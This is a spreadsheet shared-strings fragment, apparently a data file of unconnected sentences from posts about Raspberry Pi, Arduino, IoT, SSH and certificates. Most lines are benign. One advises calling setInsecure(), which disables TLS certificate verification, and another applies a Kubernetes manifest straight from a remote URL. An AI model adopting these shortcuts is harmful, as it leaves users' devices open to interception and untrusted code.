    <t>It uses the interception application block to provide runtime abilities of rolling back any changes that were made to the database during Data related unit tests.</t>
  </si>
  <si>
    <t>These device sensors have connectivity issues so some metrics need to be calculated in a time window using statistical methods to get the count of telemetry events that trigger an alert.</t>
  </si>
  <si>
    <t>I'm trying to build Azure Image Classifier Module but when building the module it gets failed and showing the error like Packages do not match the hashes.</t>
  </si>
  <si>
    <t>For web services, device detection is typically performed by way of User-Agent string matching, as a way of tailoring content to different types of devices.</t>
  </si>
  <si>
    <t>By default, untrusted code executed in the
sandbox cannot modify the environment (write a file, use print or import a
module).</t>
  </si>
  <si>
    <t>The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer.</t>
  </si>
  <si>
    <t>User permissions:
Also, I've tried to push the command directly in /etc/network/interfaces
by adding a row 
Contents of sendemail.sh:
#!/bin/sh
python /home/pi/r/pip.py
After the reboot, nothing actually happen.</t>
  </si>
  <si>
    <t>I want to connect my laptop(which has ubuntu as OS) and my raspberry(with ubuntu server) via ssh and I followed the steps by confuguring the ssh_config and sshd_config files, authorized keys with permissions, I set Password_Authentication to yes, created Allow_Users and added my username etc.</t>
  </si>
  <si>
    <t>Chances are your college is using something like "WPA2-Enterprise" that involves a server on the back end to authenticate each client individually as they connect, hence the reason you need a user name.</t>
  </si>
  <si>
    <t>RMI registry is kind of RMI naming service (a server application) where remote objects could be registered under some string name so they could be found and accessed by other clients connecting the same registry.</t>
  </si>
  <si>
    <t>I've been looking around for a clear answer on how to store certificates and/or private keys on a Raspberry Pi for end user distribution.</t>
  </si>
  <si>
    <t>Json validation tools say my json format is valid but Azure say's it's not when i test the routing.</t>
  </si>
  <si>
    <t>If you want something less trivial (and the arduino fits it), you could sign the password with your private key, and store your public key in the source.</t>
  </si>
  <si>
    <t>By the way, it would not hurt making the script wait for each prompt - if you start your program before the RPi, the login will be lost.</t>
  </si>
  <si>
    <t>When using the cv2.capture method one must ensure that the correct drivers are loaded otherwise you will end up with the same NoneType error.</t>
  </si>
  <si>
    <t>This answers a lot of the questions I had about the process of connecting to a different wifi and password with ESP8266 and Arduino uno and adding custom parameters.</t>
  </si>
  <si>
    <t>With modman, you can specify in a text file where you want your directories and files to be mapped to, and it will maintain symlinks for you so that your code is easy to hack and deploy.</t>
  </si>
  <si>
    <t>Factories or singletons are registered, and either global or local scopes are used to inject values into Kotlin classes.</t>
  </si>
  <si>
    <t>Add, remove, and update badges and labels on items in a monitored folder.</t>
  </si>
  <si>
    <t>git-crypt lets you freely share a repository containing a mix of public and private content.</t>
  </si>
  <si>
    <t>ITfoxtec Identity SAML 2.0 is a open source package adding SAML-P support for both IdP and RP on top of the SAML 2.0 functionality implemented in the .NET.</t>
  </si>
  <si>
    <t>The Raspberry Pi will obviously sit on a local network with access to download/upload information on the internet, the Raspberry Pi will have a username and password to access the web interface.</t>
  </si>
  <si>
    <t>us
EDIT: I switched to DietPi--it had an easily accessible config file for preconfiguring the SSID and WiFi password.</t>
  </si>
  <si>
    <t>Not just using the public IP address, but from a device that would need to enter your network via the public interface on your router.</t>
  </si>
  <si>
    <t>I was able to resolve this issue.I was using openssl pkcs12  to convert the certificates and keys into .p12 format.</t>
  </si>
  <si>
    <t>Pi2: follow Adafruit description
Pi3: "sudo raspi-config" &gt; "Interfacing Options" &gt; "Serial"
&gt; "...login shell... over serial?"</t>
  </si>
  <si>
    <t>Keep in mind that the public key is generated from the private key; it can't be controlled directly.</t>
  </si>
  <si>
    <t>IoT Hub SDK for C does not provide the method for that.It provides utility functions in x509_schannel.c.You can use OpenSSL library like following code.</t>
  </si>
  <si>
    <t>Proof General is a generic front-end for proof assistants, based on Emacs.</t>
  </si>
  <si>
    <t>Lastly, XHP forces valid HTML markup at compile time (and will fail completely if it's invalid).</t>
  </si>
  <si>
    <t>NIS then adds another global user list which is used for identifying users on any client of the NIS domain.</t>
  </si>
  <si>
    <t>So bluetooth - as clearly pointed out in the comments - is not designed for mesh networking.</t>
  </si>
  <si>
    <t>name.py
then set the permissions (all the following commands are done in the terminal)
then you can run it as
$ ./name.py
if you wanted to run it as sudo you would do
$ sudo ./name.py</t>
  </si>
  <si>
    <t>Using those credentials it can connect to IoTF and publish events and receive commands.</t>
  </si>
  <si>
    <t>Adding Bouncy Castle and adding to Security providers it with following code
worked for me
Hope it helps you and others</t>
  </si>
  <si>
    <t>I am lack of knowledge of nameserver, but I have an idea that using vpn or vps to map users to my private network instead of godaddy domain manager.</t>
  </si>
  <si>
    <t>My idea:
I want to use the MAC-Adress of the raspberry Pis' as an unique identifier but how can I get the adress in a node-red function block?</t>
  </si>
  <si>
    <t>When I reboot it won't create a network nor reconnect to the existing network.</t>
  </si>
  <si>
    <t>So I declared the vector as private in the header, while it will compile.</t>
  </si>
  <si>
    <t>I would go the way how it is implemented in ThingSpeak - your Arduino should know the private key to post to the data store.</t>
  </si>
  <si>
    <t>(For security purposes, you should never upload the PFX or the private keys to Azure.)</t>
  </si>
  <si>
    <t>It allows me to start a SSH connection with a set command that I want to execute on the Server.</t>
  </si>
  <si>
    <t>Private is a way of encapsulation in object-oriented programming.</t>
  </si>
  <si>
    <t>Removed endpoints:
The /me/username field has been removed.</t>
  </si>
  <si>
    <t>Moved the "pycrypto-2.6.1.tar.gz" to the folder where python files are located and extracted there.</t>
  </si>
  <si>
    <t>The only way I could get eth0 to work again is by running the following commands in the terminal.</t>
  </si>
  <si>
    <t>I think blockchain.info is a good idea.</t>
  </si>
  <si>
    <t>example
Adding a 'Log in with Facebook' to an existing ASP.NET MVC web application.</t>
  </si>
  <si>
    <t>I am following the Arduino (ESP32) WiFiClientSecure example code - and trying to connect while specifying a CA Certificate, such as:
(test_client_cert and test_client_key are NULL pointers).</t>
  </si>
  <si>
    <t>I am looking for options to set security while pairing.</t>
  </si>
  <si>
    <t>I add codes of adding the mac address of the Client to the mac deny list in hapd-&gt;conf-&gt;deny_mac.</t>
  </si>
  <si>
    <t>Consequently, call UpdateCertificate and mark that certificate as INACTIVE.</t>
  </si>
  <si>
    <t>Then you go and assign something of type Estado* as returned by new:
 estados[i] = new Estado(token);
That can't work.</t>
  </si>
  <si>
    <t>You can do it using the C function  to tokenize the buffer</t>
  </si>
  <si>
    <t>However the project can be used to encode and decode barcodes on desktops and servers as well</t>
  </si>
  <si>
    <t>This is creating an invalid command.</t>
  </si>
  <si>
    <t>I'm also using an anti virus called kaspersky.</t>
  </si>
  <si>
    <t>Do I need to use ssh-agent to manage the keys?</t>
  </si>
  <si>
    <t>I would like to test WiFi connectivity on mbed board (Nucleo ST F401RE) using Arduino Wifi shield.</t>
  </si>
  <si>
    <t>I am able to connect to my board using SSH from the command line.</t>
  </si>
  <si>
    <t>Origin 'http://raspberrypi.local' is therefore not allowed access.</t>
  </si>
  <si>
    <t>But I also have a desktop I want to access via SSH at a different desktop@82.90.233.234.</t>
  </si>
  <si>
    <t>i want to boot raspberry in text mode and it will ask for login.</t>
  </si>
  <si>
    <t>So I have two lines in authorized_keys.</t>
  </si>
  <si>
    <t>Is there a way to do this with ssh or another method?</t>
  </si>
  <si>
    <t>xpcall won't work in the case of a PANIC device reset.</t>
  </si>
  <si>
    <t>mosquitto_sub -h myhost.com -p 8883 -t "/test" --cafile ca.crt --cert client.crt --key client.key
But is there a way to do this in arduino?</t>
  </si>
  <si>
    <t>Below is the basic code for keypad PIN entry, if I comment out the keypad.getkey() it will update, but with it in it does not work.</t>
  </si>
  <si>
    <t>Here is my code so far:
auth.lua
server.lua</t>
  </si>
  <si>
    <t>I have set allow_anonymous to false and password_file to /etc/mosquitto/passwd in mosquitto.conf.</t>
  </si>
  <si>
    <t>What is the format in which this certificate should be specified?</t>
  </si>
  <si>
    <t xml:space="preserve"> of Arduino library for ESP8266 has methods: setCACert, setCertificate, setPrivateKey.</t>
  </si>
  <si>
    <t>Another example of an instrumentation system is a home security system.</t>
  </si>
  <si>
    <t>+ echo You will be prompted for your password by sudo.</t>
  </si>
  <si>
    <t>You will be prompted for your password by sudo.</t>
  </si>
  <si>
    <t>Then I tested same string-key-metod encryption in PHP and NodeMCU.</t>
  </si>
  <si>
    <t>So lets say I am connected to a Raspberry Pi via SSH on my local network.</t>
  </si>
  <si>
    <t>I am using Plink to SSH into the Pi over command line.</t>
  </si>
  <si>
    <t>Is there a way I can do this that will work for all login methods?</t>
  </si>
  <si>
    <t>called "TLS with authentication token".</t>
  </si>
  <si>
    <t>I have an account on the box called minion, but I'm not sure where I can use it with it's password (which I haven't even looked at).</t>
  </si>
  <si>
    <t>Mar  2 22:12:23 raspberrypi systemd[711]: Listening on GnuPG cryptographic agent and passphrase cache.</t>
  </si>
  <si>
    <t>Is it maybe about permissions or apache2 config?</t>
  </si>
  <si>
    <t>To force a client off the wifi you can use either the "disassociate" or the "deauthenticate" command.</t>
  </si>
  <si>
    <t>What is the 8 in the authenticateBlock() call?</t>
  </si>
  <si>
    <t>return AuthToken("Andrew","1234") that is.</t>
  </si>
  <si>
    <t>If you have no crontab, it will display no crontab for &lt;username&gt; on stderr and exit with error code 1.</t>
  </si>
  <si>
    <t>It should work, but it probably needs a password to the HC-05 module.</t>
  </si>
  <si>
    <t>This way, accessing them will not raise any complaints.</t>
  </si>
  <si>
    <t>Linker was looking for libssl.so and libcrypto.so.</t>
  </si>
  <si>
    <t>Launch an administrator PowerShell console on your local PC.</t>
  </si>
  <si>
    <t>Tried all the authentication methods but it didn't work.</t>
  </si>
  <si>
    <t>validBits could be null.</t>
  </si>
  <si>
    <t>(code not tested, all my raspberries are in the garden)</t>
  </si>
  <si>
    <t>To be sure your electrics is OK you can test it.</t>
  </si>
  <si>
    <t>I have not coded or tested either, like I normally would - sorry.</t>
  </si>
  <si>
    <t>Did you try login into the /portal with a private browser window?</t>
  </si>
  <si>
    <t>sslContext bean holds the certificate/security :</t>
  </si>
  <si>
    <t>I use cyberduck and sublime text.</t>
  </si>
  <si>
    <t>Just don't care about User-Agent for now.</t>
  </si>
  <si>
    <t>try using putty to connect to your raspberry pi, and then run your commands in the ssh session.</t>
  </si>
  <si>
    <t>BTW, you can use tkinter over ssh.</t>
  </si>
  <si>
    <t>As user7414723 said, you don't need to run ssh with raised rights.</t>
  </si>
  <si>
    <t>However, i believe even authentication can be done with these commands.</t>
  </si>
  <si>
    <t>Auto login IS available in raspi-config.</t>
  </si>
  <si>
    <t>Client can use ssh to log into the RPi and run the commands.</t>
  </si>
  <si>
    <t>You can use the RegistryManager to access the IotHub devices twins.</t>
  </si>
  <si>
    <t>Go to the file /Users/YOU/.ssh/known_hosts and remove the ip and key of the pi</t>
  </si>
  <si>
    <t>How to enable debug logs on iotedged (security daemon)?</t>
  </si>
  <si>
    <t>Remove the ca_certs in the ssl_params dictionary.</t>
  </si>
  <si>
    <t>Next we have to config networkmanager.</t>
  </si>
  <si>
    <t>If you try vsftpd, don't chroot your local users.</t>
  </si>
  <si>
    <t>You can have a look here for more info about certificates.</t>
  </si>
  <si>
    <t>Once youve done that, you need to append the key to the authorized_keys file on the Pi.</t>
  </si>
  <si>
    <t>Like this:
getTwin() method remove $keys.</t>
  </si>
  <si>
    <t>Call httpsClient.setInsecure() before connect().</t>
  </si>
  <si>
    <t>You should use Proof of Authority for consensus in a private network.</t>
  </si>
  <si>
    <t>On Windows it uses the LockFile(), LockFileEx(), and UnlockFile() system calls.</t>
  </si>
  <si>
    <t>I doubt this.connected is necessary as there is likely a access method on SerialPort but I was just using it for troubleshooting.</t>
  </si>
  <si>
    <t>Code division multiple access (CDMA): the channel access method.</t>
  </si>
  <si>
    <t>Devise's Confirmable module</t>
  </si>
  <si>
    <t>Pageant is an PuTTY SSH authentication agent.</t>
  </si>
  <si>
    <t>Use [nspredicate] for NSPredicate Like operator.</t>
  </si>
  <si>
    <t>References:
Intel IPP website
Intel IPP on Wikipedia</t>
  </si>
  <si>
    <t>/me/checkins has been removed, along with the user_checkins permission.</t>
  </si>
  <si>
    <t>/me/username has been removed.</t>
  </si>
  <si>
    <t>References
Google OAuth website</t>
  </si>
  <si>
    <t>Reference
Opauth</t>
  </si>
  <si>
    <t>Any text that does so should be considered suspect.</t>
  </si>
  <si>
    <t>Users can login using local authentication, Google, Microsoft or Facebook social login.</t>
  </si>
  <si>
    <t>I have a solution of SSH reverse tunneling (explained here http://www.thirdway.ch/En/projects/raspberry_pi_3g/index.php) but I can just connect to port 22, and in the main server I have 100 different ports for each tunneling ... a nightmare.</t>
  </si>
  <si>
    <t>My situation is roughly this: I need to create a 'chat flow', into which users can also add self-encapsulated submodules that have their own unique, private channels to communicate on.</t>
  </si>
  <si>
    <t>PS: You need to install SSH.NET using the Nuget Manager, by typing the next line on the console: Install-Package SSH.NET -Pre
Hope It helps.</t>
  </si>
  <si>
    <t>Fixture categorizes the test cases that logically belong to a related scenario, such as Login screen tests, Load database with master data, etc.</t>
  </si>
  <si>
    <t>SinglyRequest, an API client that makes it easy to call any method of the Singly API including authentication, social data, friends, and photo sharing.</t>
  </si>
  <si>
    <t>SinglyClient, an API client that makes it easy to call any method of the Singly API including authentication, social data, friends, and photo sharing.</t>
  </si>
  <si>
    <t>In addition to the conceptual advantage of having idempotent request behaviour, FakeWeb makes tests run faster than if they were made to remote (or even local) web servers.</t>
  </si>
  <si>
    <t>How TCP fits into Internet protocol suite layers (going top to bottom):
Application: Encrypts data to be sent or sends data in a specific format (e.g.</t>
  </si>
  <si>
    <t>The argparse module also automatically generates help and usage messages and issues errors when users give the program invalid arguments.</t>
  </si>
  <si>
    <t>Spork runs more solid: it doesnt get corrupted over time, it can work with any ruby framework, and it properly handles modules and any voodoo meta programming you may have put in your app.</t>
  </si>
  <si>
    <t>Start raspi-config with  and make sure to turn on the SSH server (menue 7 Advanced Options -&gt; A4 SSH).</t>
  </si>
  <si>
    <t>Remember to call
  this function after communicating with an authenticated PICC -
  otherwise no new communications can start.</t>
  </si>
  <si>
    <t>Using CENC (Common Encryption) which is in-line with other DRM providers regarding the license structure - such as PlayReady from Microsoft.</t>
  </si>
  <si>
    <t>Its dedicated security namespace provides directives for most common operations, allowing complete application security in just a few lines of XML.</t>
  </si>
  <si>
    <t>Mocking differs from faking in that a mock can be inspected to assert the results of a test.</t>
  </si>
  <si>
    <t>In general, you cannot count on this method and should always prefer explicit control of the encoding.</t>
  </si>
  <si>
    <t>This is an Arduino flaw, apparently some very old libraries where compiled with this flag on, and now they don't want to remove it for fear of disrupting old code.</t>
  </si>
  <si>
    <t>But even for public information, passwords are often used to selectively grant edit privileges.</t>
  </si>
  <si>
    <t>Both libraries use a common output format, allowing sharing of encrypted data between Java (hence, Android) and iOS applications.</t>
  </si>
  <si>
    <t>I've written a script in Python 3 and I would need to start it up automatically just when system boots up, without logging in.</t>
  </si>
  <si>
    <t>open the terminal and tap the following commands:
NOTE: xxxxx is your username</t>
  </si>
  <si>
    <t>I wonder why creating buckets (conrainers) works but the upload of a file fails because of Permission denied.</t>
  </si>
  <si>
    <t>This way you can't just trigger the event while in a text box elsewhere and find out my password.</t>
  </si>
  <si>
    <t>From the code you provided, i can not find the line to register the  event handler.</t>
  </si>
  <si>
    <t>Any files which you want to put on war but do not want to make to public then web-inf is the place where you can keep those files.</t>
  </si>
  <si>
    <t>Anything related with MUNGE service for creating and validating credentials.</t>
  </si>
  <si>
    <t>All future Git commands will reuse the existing credentials.</t>
  </si>
  <si>
    <t>It helps peers located behind different NATs communicate with each other when they only have private IP addresses.</t>
  </si>
  <si>
    <t>A 404 often means that the URL requested is invalid or points to a file that no longer exists (e.g.</t>
  </si>
  <si>
    <t>cPanel is designed to function either as a dedicated server or virtual private server.</t>
  </si>
  <si>
    <t>The error message that I am receiving is:
invalid conversion from  to char
Here is my code:</t>
  </si>
  <si>
    <t>Secondly, you need to firewall block for the server port you used, the following command could allow the access.</t>
  </si>
  <si>
    <t>It helps peers located behind NATs communicate with each other when they only have private IP addresses.</t>
  </si>
  <si>
    <t>I have tried putting the create options to privileged.</t>
  </si>
  <si>
    <t>I am creating a proxy server on my raspberry pi, connected to my home internet connection.</t>
  </si>
  <si>
    <t>The firmware has been built using only the following modules: file, gpio, net, node, tmr, uart, websocket, wifi.</t>
  </si>
  <si>
    <t xml:space="preserve">
In the image above you see "Type: SSH" in the Remove Server options.</t>
  </si>
  <si>
    <t>Obviously better to use 'MPLAYER_HOME' variable rather than 'HOME' which can be compromised via the web server.</t>
  </si>
  <si>
    <t>You can use tools like Angry IP Scanner to scan the network and find your IP if you cannot access it from myusername.local.</t>
  </si>
  <si>
    <t>As amadain mentioned in the comments - That error is normally seen when creating an application whose name is not unique.</t>
  </si>
  <si>
    <t>I just put username and password as variables in the headers.</t>
  </si>
  <si>
    <t>To setup autologin first create a script called autologin in /bin directory that does:
Note: pi is an user on raspbian that won't ask for password when sudo-ing.</t>
  </si>
  <si>
    <t>The fake signals ERR and EXIT within functions.</t>
  </si>
  <si>
    <t>Hoogle also searches for identifiers and signatures, but only works when the function comes from a known package.</t>
  </si>
  <si>
    <t>Remote tracking allows you to follow calls from one profiled JVM to another.</t>
  </si>
  <si>
    <t>Before using lavf, you need to call  to register all compiled muxers, demuxers and protocols.</t>
  </si>
  <si>
    <t>This can for example be used to validate the data that has been entered by the user by calling a specified JavaScript function.</t>
  </si>
  <si>
    <t>I implemented the org.bluez.Agent1 interface using QDbus and I would like to set a fixed pin (that I will provide to the users) in order to authenticate all the pairing request and reject them if the pin is wrong.</t>
  </si>
  <si>
    <t>When ssh into the pi and use minicom (to test my functions) all commands work perfectly.</t>
  </si>
  <si>
    <t>I ssh into it and run the following command:
It works as intended.</t>
  </si>
  <si>
    <t>), so I found an alternative called SSH.</t>
  </si>
  <si>
    <t>Replaces SHA1 and MD5 insecure hashing.</t>
  </si>
  <si>
    <t>Matrix is an ambitious new ecosystem for open federated Instant Messaging and VoIP.</t>
  </si>
  <si>
    <t>I ssh the master and use these commands to install it (origin: https://blog.hypriot.com/post/setup-kubernetes-raspberry-pi-cluster/) :
$ kubectl apply -f https://raw.githubusercontent.com/hypriot/rpi-traefik/master/traefik-k8s-example.yaml
$ kubectl label node node01 nginx-controller=traefik
All system pods are running.</t>
  </si>
  <si>
    <t>I've generated the JWT using a Qt application I found, using the private key.</t>
  </si>
  <si>
    <t>Using a terminal run the command python verify_pipsta_install.py.</t>
  </si>
  <si>
    <t>private keys are ideally never transferred.  )</t>
  </si>
  <si>
    <t>The others are called secondary keys or alternate keys.</t>
  </si>
  <si>
    <t>The main advantages of precompiling chunks are:
Faster loading;
Protecting source code from accidental user changes;
off-line syntax checking.</t>
  </si>
  <si>
    <t>The if (inByte == '\n') is getting validated as true.</t>
  </si>
  <si>
    <t>Here's the ridiculous run around way I had to use until legitimate values were returned.</t>
  </si>
  <si>
    <t>Is there a way to disable Chormium's shortcut keys in Linux?</t>
  </si>
  <si>
    <t>i want to send commands to my raspberry pi via ssh from iPhone app.</t>
  </si>
  <si>
    <t>I don't get really into Jsch, my SSH connection already works but not sending commands.</t>
  </si>
  <si>
    <t>The webserver can ask for sudo password to the client, which can be used to raise the privileges.</t>
  </si>
  <si>
    <t>The username and password is already public () so this is just to learn how password on Linux works and if it is even possible.</t>
  </si>
  <si>
    <t>I don't need to get any return value nor confirmation.</t>
  </si>
  <si>
    <t>This is all I could think of:
remove wifi password
rm ssh known hosts file
default password is standard "raspberry"
Anything else?</t>
  </si>
  <si>
    <t>Before I begin, I'm using python3, praw, and oauth2_util on the raspbian OS command line.</t>
  </si>
  <si>
    <t>So I have a script that is launched on login via rc.local.</t>
  </si>
  <si>
    <t>But the function is notified as invalid.</t>
  </si>
  <si>
    <t>The information should be kept private and only allowed to be accessed by the Pi.</t>
  </si>
  <si>
    <t>What type of authentication should I use to verify that only the Pi is returned the data and on one else?</t>
  </si>
  <si>
    <t>Most recent error is 'login failed for user mjmain/mpi'.</t>
  </si>
  <si>
    <t>@Edit
Ok, so what I learnt so far is that the private key is different for every ESP8266.</t>
  </si>
  <si>
    <t>But every command I try, I get not acknowledged.</t>
  </si>
  <si>
    <t>However, when it runs at boot and I connect via SSH as soon as it's available, it still runs the script.</t>
  </si>
  <si>
    <t>I'm running this test while logged in over SSH with weaved.</t>
  </si>
  <si>
    <t>I am trying to replace the mbedTLS network layer with wolfSSL in the AWS IoT C SDK.</t>
  </si>
  <si>
    <t>I am receiving certificate and private key from server to connect with AWS iot.</t>
  </si>
  <si>
    <t>On my RPi i have ssh enabled, also php, apache, mysql and all the pip packages for my python server.</t>
  </si>
  <si>
    <t>And is there a way to catch some errors with the WiFiClientSecure.h library.</t>
  </si>
  <si>
    <t>The Device Portal Core API contains a Post method for connecting/disconnecting Wifi.</t>
  </si>
  <si>
    <t>I have a private M2M GSM network for my company devices.</t>
  </si>
  <si>
    <t>So maybe there is a way to protect the call?</t>
  </si>
  <si>
    <t>SSH tunnel is okay, I just want to somehow run a browser on my RPI3 in my home network.</t>
  </si>
  <si>
    <t>Is there an easy function to encrypt and decrypt a "command string".</t>
  </si>
  <si>
    <t>I then trust, pair and connect.</t>
  </si>
  <si>
    <t>But only libssl.so.1.1 is included into the rootfs.</t>
  </si>
  <si>
    <t>I have a webpage that connects to AWS IoT using MQTT through a websocket with an unregistered AWS Cognito identity.</t>
  </si>
  <si>
    <t>I am building a private LoRa network without LoRaWAN protocol.</t>
  </si>
  <si>
    <t>Then I may have to store the key on local.</t>
  </si>
  <si>
    <t>But i cannot access the raspberrypi on another Wifi Network.</t>
  </si>
  <si>
    <t>I am running my Python FaceRecognition code on RaspberryPi but I am getting  error.</t>
  </si>
  <si>
    <t>It uses Cognito based authentication to do IoT calls.</t>
  </si>
  <si>
    <t>I'm using WiFiClientSecure, PubSubClient and my protocols are in the SPIFFS.</t>
  </si>
  <si>
    <t>Devices sending security info.</t>
  </si>
  <si>
    <t>I suspect operator precedence.</t>
  </si>
  <si>
    <t>An Arduino can be used to record and replay the IR codes.</t>
  </si>
  <si>
    <t>This way your private keys are on the pi's in the way the system is intended for.</t>
  </si>
  <si>
    <t>operator to access members.</t>
  </si>
  <si>
    <t>see http://hackteria.org/wiki/index.php/Hacked_Optical_Mouse</t>
  </si>
  <si>
    <t>They are private but being accessed from a different class.</t>
  </si>
  <si>
    <t>Do you need sudo to get the privileges you need for the usb_modeswitch command?</t>
  </si>
  <si>
    <t>To see the current permissions use the  command.</t>
  </si>
  <si>
    <t>Try to return the first IP address for eth0
or</t>
  </si>
  <si>
    <t>Modifying your code to do this could stop the spurious calls.</t>
  </si>
  <si>
    <t>Use an arg of m to get into the (undocumented, as far as I can tell?)</t>
  </si>
  <si>
    <t>what you are trying to do is called web scraping.</t>
  </si>
  <si>
    <t>First of all it would allow you to keep using your service when you want to replace your key.</t>
  </si>
  <si>
    <t>IllegalArgumentException  if params is not supported.</t>
  </si>
  <si>
    <t>In line 490 you can see all the available options for authentication:
WPA2 enterprise authentication is not yet one of them.</t>
  </si>
  <si>
    <t>Run command with root permissions</t>
  </si>
  <si>
    <t>From then on we are able to execute these commands via ssh from almost any device.</t>
  </si>
  <si>
    <t>For safety you can move  out of Sniff method like this:</t>
  </si>
  <si>
    <t>Upon first boot ssh will be enabled and the file removed.</t>
  </si>
  <si>
    <t>SSH commands might be more secure if you use SSH keys.</t>
  </si>
  <si>
    <t>Also to confirm, you put the Google root certificate on the device in the same directory as the private key:  ?</t>
  </si>
  <si>
    <t>Do you have the "InstallCert()" function in your module, and is it being called?</t>
  </si>
  <si>
    <t>Kubernetes API server is exposed through a service called kubernetes.</t>
  </si>
  <si>
    <t>It might get confused if you tried to register both key pairs, but that's about it.</t>
  </si>
  <si>
    <t>The module I am referring to is called Flask login</t>
  </si>
  <si>
    <t>But in the class, it does not provide a method to get the key value.</t>
  </si>
  <si>
    <t>As said in the comments you need to enable SSH on your pi.</t>
  </si>
  <si>
    <t>For non-private networks it corresponds to a subdomain of joineuis.lora-alliance.org.</t>
  </si>
  <si>
    <t>Pass those to the SetOption in the SDK using the keyword OPTION_TRUSTED_CERT.</t>
  </si>
  <si>
    <t>Keeping the code on your server and using internet access is the only way to keep the code private (maybe).</t>
  </si>
  <si>
    <t>That way any commands that it might run will already have privileges.</t>
  </si>
  <si>
    <t>Not specific to the LorixOne, but from gateway authentication methods, the "Association Only" auth method might be useful here.</t>
  </si>
  <si>
    <t>Meaning, For all the users (whoever logged into Pi) should have the certificate imported.</t>
  </si>
  <si>
    <t>htpasswd is a command line program of the Apache HTTP server.</t>
  </si>
  <si>
    <t>Spring Security implementation of the OAuth2 spec.</t>
  </si>
  <si>
    <t>It is also called a hot key.</t>
  </si>
  <si>
    <t>Npm package to work with Grunt which validate files with ESLint.</t>
  </si>
  <si>
    <t>Spring Security version 4</t>
  </si>
  <si>
    <t>subnets of a private network.</t>
  </si>
  <si>
    <t>The :: (scope resolution) operator is used to qualify hidden names so that you can still use them.</t>
  </si>
  <si>
    <t>ZIP codes are a system of postal codes used by the United States Postal Service (USPS) since 1963.</t>
  </si>
  <si>
    <t>Error 1067: Invalid default value for '%s'</t>
  </si>
  <si>
    <t>Apple's CommmonCrypto/CommonDigest methods and usage</t>
  </si>
  <si>
    <t>Tokyo Tyrant is a package of network interface for Tokyo Cabinet, a key value database.</t>
  </si>
  <si>
    <t>To programmatically perform a segue, the performSegueWithIdentifier method may be invoked.</t>
  </si>
  <si>
    <t>NSSlider Class Reference.</t>
  </si>
  <si>
    <t>For better security do not provide the password as part of the command and you will be securely prompted.</t>
  </si>
  <si>
    <t>For more information, see Desktop Security and Access Rights.</t>
  </si>
  <si>
    <t>RAD)
Advanced ACL for com_modules, permissions per module
Resources
Joomla!</t>
  </si>
  <si>
    <t>For the Microsoft Windows subsystem, see (local-security-authority).</t>
  </si>
  <si>
    <t>ng-invalid Is set if the form is invalid.</t>
  </si>
  <si>
    <t>The library has been tested against the Google and DailyMotion implementations of OAuth 2.0.</t>
  </si>
  <si>
    <t>This
   specification replaces and obsoletes the OAuth 1.0 protocol described
   in RFC 5849.
link: https://datatracker.ietf.org/doc/rfc6749/</t>
  </si>
  <si>
    <t>Most user should use SSH's more secure public key authentication instead.</t>
  </si>
  <si>
    <t>(paragraph 1)
The TCP/IP Guide - IP Reserved, Loopback and Private Addresses (paragraphs 2, 3)</t>
  </si>
  <si>
    <t>if package.json or any other json document is malformed, show where the error is.</t>
  </si>
  <si>
    <t>The library can read a schema from a file or string and validate JSON data against it.</t>
  </si>
  <si>
    <t>This specification replaces and obsoletes the OAuth 1.0 protocol described in RFC 5849.</t>
  </si>
  <si>
    <t>PKI is a technical and/or organizational way to bind public keys with an identity.</t>
  </si>
  <si>
    <t>Keys and Foreign Keys
A foreign key references a key.</t>
  </si>
  <si>
    <t>I'm also logged into SO too damn much, both at work and home.</t>
  </si>
  <si>
    <t>If I wanted to connect to this webapp from the command line, I assume I'll need to authenticate myself.</t>
  </si>
  <si>
    <t>Don't worry about the Card is invalid or valid, that is an irrelevant check in my code.</t>
  </si>
  <si>
    <t>This causes my ssh commands to prompt for passwords, even though the key-gen authentication is set.</t>
  </si>
  <si>
    <t>I am trying to adapt this tutorial, but I am stuck at an invalid exchange error.</t>
  </si>
  <si>
    <t>Except the command "dd" is not recognized by my Yun via ssh
4.)</t>
  </si>
  <si>
    <t>However, R was not able to login to my Raspberry Pi using the generated private key.</t>
  </si>
  <si>
    <t>Can hackers inject php code to run shell commands using it?</t>
  </si>
  <si>
    <t>If so I can just find a different reddit authentication method.</t>
  </si>
  <si>
    <t>It doesn't even prompt for a password.</t>
  </si>
  <si>
    <t>Load Error: /etc/mosquitto/auth-plug.so: Undefined Symbol: EVP_MD_CTX_reset</t>
  </si>
  <si>
    <t>Should I generate another private key(s?)</t>
  </si>
  <si>
    <t>How to generate those private keys?</t>
  </si>
  <si>
    <t>Do I still need to change the permissions via the command "chmod +x flock_email.sh"?</t>
  </si>
  <si>
    <t>How can i remove the shutdown button on raspberry login screen ?</t>
  </si>
  <si>
    <t>I have a raspberry pi 3 and I am trying to run Jasper client for offline sppech to text recognition.</t>
  </si>
  <si>
    <t>I suspect this might be a issue with the pssh package I am using.</t>
  </si>
  <si>
    <t>I have tried using impersonation as explained here: I can't access unc path from C#.</t>
  </si>
  <si>
    <t>As I've updated the ca-certificates package, I don't know what else could be the issue.</t>
  </si>
  <si>
    <t>I have added a user called arduino with a password.</t>
  </si>
  <si>
    <t>If you do, this is most likely a problem with the authblue-ui-ssr-spike package,
npm ERR!</t>
  </si>
  <si>
    <t>Commands used to generate certificates:</t>
  </si>
  <si>
    <t>When i change git for another name I get the prompt [sudo] password for git:
What is the password i should enter here?</t>
  </si>
  <si>
    <t>I'm running this on Rasbian Stretch (not ssh).</t>
  </si>
  <si>
    <t>I keep getting an Invalid Token error when I run the following .py.</t>
  </si>
  <si>
    <t>6) Save and restart node red
However I do not get the login prompt.</t>
  </si>
  <si>
    <t>I've already activated SSH in the raspian config.</t>
  </si>
  <si>
    <t>This is the method of the Azure IoT Java SDK I am using:
It takes SecurityProviderX509Cert as parameter.</t>
  </si>
  <si>
    <t>What I want is to use AMQP multiplexing by using this constructor:
This doesn't work with X.509 devices.</t>
  </si>
  <si>
    <t>I want to access my raspberrypi from outside my local network, in particular using ssh.</t>
  </si>
  <si>
    <t>I'm currently having trouble getting a command to run via ssh on my raspberry pi 3.</t>
  </si>
  <si>
    <t>I had to run , but many packages got corrupted, such as python etc.</t>
  </si>
  <si>
    <t>If I run ls -l command then it shows root user with permission drwxr-xr-x.</t>
  </si>
  <si>
    <t>So that no one else in the vicinity should be able to connect to my Hm11 Modules without knowing the password.</t>
  </si>
  <si>
    <t>Use drawUTF8 or drawGlyph to access glyphs with encoding greater or equal to 256.</t>
  </si>
  <si>
    <t>I was looking at flutter packages and there's one that allows you to ssh.</t>
  </si>
  <si>
